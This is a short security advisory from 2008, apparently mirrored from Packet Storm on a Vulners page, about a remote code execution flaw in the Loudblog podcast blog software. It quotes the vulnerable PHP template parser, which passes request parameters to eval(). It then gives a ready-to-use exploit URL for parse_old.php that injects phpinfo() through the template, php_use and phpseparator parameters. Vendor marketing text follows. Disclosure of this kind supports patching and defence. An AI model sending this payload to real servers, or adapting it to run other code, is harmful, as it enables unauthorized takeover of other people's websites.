Lucene search
K

loudblog-exec.txt

🗓️ 07 Jan 2008 00:00:00Reported by Eugene MinaevType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 29 Views

Loudblog Remote Code Executio

Code
`----[ Loudblog Remote Code Execution ... ITDefence.ru Antichat.ru ]  
  
Loudblog >= 0.6.1 Remote Code Execution  
Eugene Minaev [email protected]  
___________________________________________________________________  
____/ __ __ _______________________ _______ _______________ \ \ \  
/ .\ / /_// // / \ \/ __ \ /__/ /  
/ / /_// /\ / / / / /___/  
\/ / / / / /\ / / /  
/ / \/ / / / / /__ //\  
\ / ____________/ / \/ __________// /__ // /   
/\\ \_______/ \________________/____/ 2007 /_//_/ // //\  
\ \\ // // /  
.\ \\ -[ ITDEFENCE.ru Security advisory ]- // // / .   
. \_\\________[________________________________________]_________//_//_/ . .  
  
Template parser function  
  
<?php  
  
$parsedpage = fullparse(firstparse(hrefmagic($template)));  
  
//do we have php code within our template? switch between echo and eval!  
if ($php_use) {  
$templatepieces = explode ($phpseparator, $parsedpage);  
for ($i = 0; $i <= count($templatepieces); $i += 2) {  
echo $templatepieces[$i];  
if (isset($templatepieces[$i+1])) eval ($templatepieces[$i+1]);  
}  
//no php code, no eval!  
} else {  
echo $parsedpage;  
}   
  
?>  
  
loudblog/inc/parse_old.php?template=@phpinfo();@&php_use=1&phpseparator=@&parsedpage=@phpinfo();@  
  
  
----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation